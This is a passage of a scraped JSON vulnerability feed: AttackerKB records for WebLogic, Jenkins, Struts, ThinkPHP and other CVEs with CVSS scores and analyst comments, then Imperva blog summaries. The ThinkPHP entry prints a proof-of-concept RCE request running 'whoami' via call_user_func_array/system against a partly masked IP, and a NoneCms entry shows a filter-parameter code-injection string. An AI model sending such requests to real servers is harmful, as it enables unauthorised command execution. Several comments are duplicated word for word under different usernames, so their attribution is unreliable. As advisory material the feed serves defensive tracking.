it](<https://github.com/hktalent/CVE_2020_2546>) but I haven\u2019t tested it yet. 
Since it\u2019s yet-another deserialization vulnerability and there\u2019s existing PoC code for similar RMI RCE, Oracle\u2019s observations are likely correct.\n\n**space-r7** at May 15, 2020 7:15pm UTC reported:\n\nWell, it\u2019s bad when even _Oracle_ decides to [raise the alarm bells](<https://blogs.oracle.com/security/apply-april-2020-cpu>) (wayback machine was down, so no permalink yet) about it.\n\nThey\u2019ve detected active exploitation attempts against WebLogic servers.\n\nT3 is Weblogic\u2019s proprietary implementation of the RMI spec and is primarily used as a layer to enable JNDI calls by apps/clients.\n\nIt appears there\u2019s [PoC for it](<https://github.com/hktalent/CVE_2020_2546>) but I haven\u2019t tested it yet. Since it\u2019s yet-another deserialization vulnerability and there\u2019s existing PoC code for similar RMI RCE, Oracle\u2019s observations are likely correct.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2020-2883", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, 
"impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2555", "CVE-2020-2883"], "modified": "2020-07-30T00:00:00", "id": "AKB:255908B4-BA2B-4575-84E5-63690A0110AE", "href": "https://attackerkb.com/topics/Y21wr47Bk3/cve-2020-2883", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:40:05", "description": "The Struts 1 plugin in Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2017-9791", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791", "CVE-2017-9805"], "modified": "2023-10-05T00:00:00", "id": "AKB:4D7DB359-066E-4E56-AFBB-FA98BF564F13", "href": "https://attackerkb.com/topics/rjpuGwbz6x/cve-2017-9791", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-21T01:57:50", "description": "Vulnerability in the Oracle 
Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**ccondon-r7** at January 29, 2021 5:47pm UTC reported:\n\nSince this got a little more attention later in 2020, it\u2019s probably good to note here that there are a number of different implementations of Oracle Coherence, and the likeliest attack vector that we\u2019ve seen is WebLogic Server. WebLogic had a number of vulnerabilities that were exploited in the wild (some widely, e.g., [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server?referrer=2555#rapid7-analysis>) and [CVE-2020-14750](<https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability?referrer=2555>)) in 2020. Definitely a good idea to keep tight WebLogic patch cycles whenever possible.\n\n**space-r7** at May 15, 2020 7:02pm UTC reported:\n\nSince this got a little more attention later in 2020, it\u2019s probably good to note here that there are a number of different implementations of Oracle Coherence, and the likeliest attack vector that we\u2019ve seen is WebLogic Server. 
WebLogic had a number of vulnerabilities that were exploited in the wild (some widely, e.g., [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server?referrer=2555#rapid7-analysis>) and [CVE-2020-14750](<https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability?referrer=2555>)) in 2020. Definitely a good idea to keep tight WebLogic patch cycles whenever possible.\n\n**gwillcox-r7** at October 20, 2020 6:53pm UTC reported:\n\nSince this got a little more attention later in 2020, it\u2019s probably good to note here that there are a number of different implementations of Oracle Coherence, and the likeliest attack vector that we\u2019ve seen is WebLogic Server. WebLogic had a number of vulnerabilities that were exploited in the wild (some widely, e.g., [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server?referrer=2555#rapid7-analysis>) and [CVE-2020-14750](<https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability?referrer=2555>)) in 2020. 
Definitely a good idea to keep tight WebLogic patch cycles whenever possible.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T00:00:00", "type": "attackerkb", "title": "CVE-2020-2555", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-2555"], "modified": "2021-01-20T00:00:00", "id": "AKB:A4BDBFB9-4493-4EF5-8C05-276721F6549F", "href": "https://attackerkb.com/topics/gB0KtHnrZE/cve-2020-2555", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:14:08", "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. 
We\u2019re fixing this issue by adding `SignedObject` to the blacklist. We\u2019re also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.\n\n \n**Recent assessments:** \n \n**space-r7** at September 11, 2020 5:56pm UTC reported:\n\nThe `readFrom` method within the `Command` class in the Jenkins CLI remoting component deserializes objects received from clients without first checking / sanitizing the data. Because of this, a malicious serialized object contained within a serialized `SignedObject` can be sent to the Jenkins endpoint to achieve code execution on the target.\n\nThis is a fairly old vulnerability, so it\u2019s _unlikely_ that there are many, if any vulnerable installations on the web today, but I rated this vulnerability based on what it _could_ give an attacker if they were to find a vulnerable installation online today. This vulnerability is yet another Java deserialization vulnerability that I would define as critical given a number of reasons:\n\n 1. Unauthenticated code execution \n\n 2. There is no special / proprietary protocol that will hinder exploitation ( you just send the object in the body of a POST request ) \n\n 3. 
A proof of concept exists and has for some time \n\n\nAgain, this is an unlikely target given the date of the vulnerability, but I think an attacker would definitely aim to exploit this if it was spotted online.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-29T00:00:00", "type": "attackerkb", "title": "CVE-2017-1000353", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353"], "modified": "2020-09-23T00:00:00", "id": "AKB:5A79A3DC-D4D7-4FF8-BE45-A4E658714412", "href": "https://attackerkb.com/topics/V3oreaqint/cve-2017-1000353", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:40:05", "description": "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.\n\n \n**Recent 
assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-12-10T00:00:00", "type": "attackerkb", "title": "CVE-2018-1000861", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2023-10-06T00:00:00", "id": "AKB:CF786BB6-FE33-44E5-A228-09F3AF0A9BDF", "href": "https://attackerkb.com/topics/7QecWDLgpk/cve-2018-1000861", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:42:39", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). 
CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**elligottmc** at October 29, 2020 2:27pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**ccondon-r7** at November 01, 2020 4:19pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**lvarela-r7** at October 29, 2020 12:41pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-14882 \u2014 Unauthenticated RCE in Console component of Oracle WebLogic Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-2555", "CVE-2021-26084"], "modified": "2020-12-28T00:00:00", "id": "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "href": "https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:42:27", "description": "An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\\think\\Request/input&filter=phpinfo&data=1 query string.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-12-11T00:00:00", "type": "attackerkb", "title": "CVE-2018-20062", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-20062"], "modified": "2023-10-06T00:00:00", "id": "AKB:63D693EA-4871-437C-A21E-2D78757ACEA7", "href": "https://attackerkb.com/topics/S10TE99uyN/cve-2018-20062", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:37:04", "description": "The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application\u2019s GET handler by using a different method.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {}, "published": "2010-04-28T00:00:00", "type": "attackerkb", "title": "CVE-2010-0738", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738"], "modified": "2023-10-04T00:00:00", "id": "AKB:19837D50-02C3-4ED0-8BAB-002F18DFF473", "href": "https://attackerkb.com/topics/Hd2naU2Dub/cve-2010-0738", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-10-18T16:42:36", "description": "ThinkPHP before 3.2.4, as used in Open 
Source BMS v1.1.1 and other products, allows Remote Command Execution via public//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.\n\n \n**Recent assessments:** \n \n**Mad-robot** at July 05, 2020 1:53pm UTC reported:\n\n**ThinkPHP RCE**\n\n**DESCRIPTION**\n\nThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via public//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.\n\n**PROOF OF CONCEPT** \nThe RCE (Remote Command Execution) vulnerability is triggered by an HTTP request. Successfully executed the command \u201cwhoami\u201d. \npoc:\n \n \n http://58.82.XXX.XXX:8080/public//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami\n \n\nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-02-24T00:00:00", "type": "attackerkb", "title": "CVE-2019-9082", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2019-9082"], "modified": "2023-10-06T00:00:00", "id": "AKB:EA640ECF-7004-4162-AC75-C0BB62190E7F", "href": "https://attackerkb.com/topics/nBAWl0YekR/cve-2019-9082", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2017-12-25T19:52:24", "description": "I recently took a step back to review all the content we shared in 2017 on the Imperva blog. We covered a broad range of topics including data security, cloud migration, application and API security, AI and machine learning, cybersecurity research, GDPR, insider threats and more. We were busy! Cybersecurity certainly held the world's attention in 2017.\n\nSeveral stories rose to the top as either most read by you, particularly relevant to today's cybersecurity industry or exceptionally newsworthy (and in some cases, all of the above). For an end-of-year reading shortlist, I've compiled our top 10 blog posts from 2017.\n\n## 1\\. What\u2019s Next for Ransomware: Data Corruption, Exfiltration and Disruption\n\nThe WannaCry ransomware attack caught everyone off guard, infecting more than 230,000 computers in 150 countries by encrypting data on networked machines and demanding payments in Bitcoin. We wrote about how to [protect against it](<https://www.imperva.com/blog/2017/05/protect-against-wannacry-with-deception-based-ransomware-detection/>), but our post on [what's next for ransomware](<https://www.imperva.com/blog/2017/05/whats-next-for-ransomware/>) garnered even more attention\u2014it was our most read post of the year.\n\n## 2\\. CVE-2017-5638: Remote Code Execution (RCE) Vulnerability in Apache Struts\n\nApache Struts made headlines all over the place in 2017. The [vulnerability we wrote about in March](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) hit it big and just kept on going. 
You might remember it reared its ugly head later in the year when it was tied to the Equifax breach. (We also wrote about two other Apache Struts vulnerabilities: [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) and [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>).)\n\n## 3\\. Top Insider Threat Concern? Careless Users. [Survey]\n\nWe [surveyed 310 IT security professionals](<https://www.imperva.com/blog/2017/07/top-insider-threat-concern-careless-users-survey/>) at [Infosecurity Europe](<http://www.infosecurityeurope.com/>) in June on their thoughts on insider threats. The big reveal? More than half (59 percent) were concerned not primarily about malicious users, but about the careless ones who unwittingly put their organization\u2019s data at risk. (We shared more about insider threats in this [infographic](<https://www.imperva.com/blog/2017/05/thwart-insider-threats-with-machine-learning-infographic/>).)\n\n## 4\\. Uncover Sensitive Data with the Classifier Tool\n\nIn July we launched Classifier, a free data classification tool that allows organizations to quickly uncover sensitive data in their databases. The response was immediate\u2014over 500 [downloads ](<https://www.imperva.com/lg/lgw_trial.asp?pid=582>)and counting\u2014not surprising given it helps jump start the path to compliance with the GDPR. [Our blog post ](<https://www.imperva.com/blog/2017/07/uncover-sensitive-data-with-the-classifier-tool/>)walked through the steps of how to use the tool.\n\n## 5\\. Professional Services for GDPR Compliance\n\nSpeaking of the GDPR, the new data protection regulation coming out of the EU was on everyone's radar this year. 
We wrote a LOT about GDPR, including [who is subject to the regulation](<https://www.imperva.com/blog/2017/02/gdpr-series-part-1-gdpr-apply/>), [what rules require data protection technology](<https://www.imperva.com/blog/2017/03/gdpr-series-part-2-rules-require-data-protection-technology/?utm_source=socialmedia&utm_medium=organic_empshare&utm_campaign=2017_Q1_GDPRPart2>), and the [penalties for non-compliance.](<https://www.imperva.com/blog/2017/03/gdpr-series-part-4-penalties-non-compliance/>) However, our post on the [professional services we offer for GDPR compliance](<https://www.imperva.com/blog/2017/10/professional-services-for-gdpr-compliance/>) drove the most traffic on this topic by far.\n\n## 6\\. The Evolution of Cybercrime and What It Means for Data Security\n\nHackers tactics may change, but what they\u2019re after doesn\u2019t\u2014your data. Stealing or obstructing access to enterprise data is the foundation of the cybercrime value chain. We discussed how the [changing nature of cybercrime](<https://www.imperva.com/blog/2017/06/the-evolution-of-cybercrime-and-what-it-means-for-data-security/>) and app and data accessibility create risk and the essentials of application and data protection in this ever-changing world.\n\n## 7\\. Move Securely to the Cloud: WAF Requirements and Deployment Options\n\nMoving to the cloud has become an overwhelmingly popular trend even among those who were at first reluctant to make the move. In this post, we discussed [requirements and deployment options for evaluating a WAF for the cloud](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). (We also wrote about the [benefits of a hybrid WAF deployment ](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)and the pros and cons of both cloud and on-prem WAFs.)\n\n## 8\\. 
Clustering and Dimensionality Reduction: Understanding the \u201cMagic\u201d Behind Machine Learning\n\nEverywhere you turned in 2017 you heard about AI and machine learning and the impact they're having, or will have, on essentially everything. Two of Imperva's top cybersecurity researchers explained in detail [some of the techniques used in machine learning](<https://www.imperva.com/blog/2017/07/clustering-and-dimensionality-reduction-understanding-the-magic-behind-machine-learning/>) and how they're applied to solve for identifying improper access to unstructured data. (Those two researchers were also awarded a patent for their machine learning work this year!)\n\n## 9\\. Can a License Solve Your Cloud Migration Problem?\n\nGartner published their [2017 Magic Quadrant for Web Application Firewalls ](<https://www.imperva.com/blog/2017/08/gartner-magic-quadrant-for-wafs-a-leader-four-consecutive-years/>)(WAF) in August and Imperva was once again named a WAF leader, making it four consecutive years. We stood out for offering security solutions for today's changing deployment and infrastructure model. [In this post](<https://www.imperva.com/blog/2017/11/license-solve-cloud-migration-problem/>) we wrote about our flexible licensing program, which lies at the core of the move to the cloud: helping customers secure apps wherever they need, whenever they need, for one price.\n\n## 10\\. The Uber Breach and the Case for Data Masking\n\nLast but not least, we couldn't ignore the Uber breach. Hard to believe in today's world that log in credentials were shared in a public, unsecured forum, but that's what happened. The breach did highlight an important issue, that of production data being used in development environments. It's a bad idea; [we explained why in this post](<https://www.imperva.com/blog/2017/11/uber-breach-case-data-masking/>). 
Had data masking been used at Uber, hackers would have been left with worthless data, or as we called it, digital fools gold.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-12-18T17:43:16", "type": "impervablog", "title": "Imperva\u2019s Top 10 Blogs of 2017", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-12-18T17:43:16", "id": "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "href": "https://www.imperva.com/blog/2017/12/impervas-top-10-blogs-of-2017/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-21T16:39:07", "description": "People used to argue about whether cyber security is a business problem or a technical problem. But this frames the issue poorly. \u201cProblem\u201d and \u201csolution\u201d imply that there is a definitive \u201csolve.\u201d\n\nCybercrime isn\u2019t a technical problem that can be definitively solved. It is an inherent business risk of having something of value. And risk can\u2019t be solved. 
